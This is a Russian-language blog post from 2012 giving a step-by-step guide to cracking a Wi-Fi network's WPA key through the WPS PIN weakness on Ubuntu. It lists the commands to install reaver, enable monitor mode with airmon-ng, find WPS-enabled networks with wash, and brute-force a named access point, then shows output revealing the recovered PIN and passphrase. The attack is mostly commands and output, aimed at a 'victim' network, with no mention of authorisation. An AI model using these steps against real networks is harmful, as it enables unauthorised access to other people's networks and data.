пятница, 21 сентября 2012 г.

Ломаем Wi-Fi через WPS

Целью протокола WPS(Wi-Fi Protected Setup) является упрощение процесса настройки беспроводной сети. Суть технологии и уязвимости отлично расписана в журнале Хакер, Март (03) 158, а также на HabraHabr в следующих статьях тут и тут. В этой же статье я опишу как все это проделать в Ubuntu 10.04 (12.04).
Вардрайвинг
Вардрайвинг

Для данных целей имеем:
  • Ноутбук Asus EeePC 1005P c Ubuntu 10.04 (12.04 собственно LTS оно лучше) на борту
  • Wi-Fi точку (наша жертва)
  • Руки, желательно две
Готовимся. Ставим необходимые пакеты и reaver (берем тут


sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-0 libsqlite3-dev
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar -xzvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install
 
В начале смотрим на наши беспроводные интерфейсы и переводим с помощью airmon-ng в режим мониторинга (установка aircrack-ng описана тут)
1
2
iwconfig
sudo airmon-ng start wlan0
Виртуальный интерфейс mon0 создан, теперь посмотрим на сети вокруг нас:
1
sudo airodump-ng mon0
Наша цель сеть HOME. Проверяем работает ли WPS на ней:
1
sudo wash -i mon0
Наша сеть HOME появилась, следовательно WPS на ней присутствует. Ломаем!
1
sudo reaver -i mon0 -b B8:A3:86:19:FB:56 -vv
Вывод будет примерно следующий:
1
2
3
4
5
6
7
8
9
10
11
12
13
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from B8:A3:86:19:FB:56
[+] Associated with B8:A3:86:19:FB:56 (ESSID: HOME)
[+] Trying pin 63979978
 
#Ждем когда пару часов, когда сутки...
 
[+] Trying pin 64637129
[+] Key cracked in 13654 seconds
[+] WPS PIN: '64637129'
[+] WPA PSK: '100VfrfrGfkbJnUhbggf!'
[+] AP SSID: 'HOME'
Собственно [+] WPS PIN: ’64637129′ подобранный WPS ключ, [+] WPA PSK: ’100VfrfrGfkbJnUhbggf!’ ключ к сети.
Взлом WPA и WEP описан в этой статье
 

1 комментарий: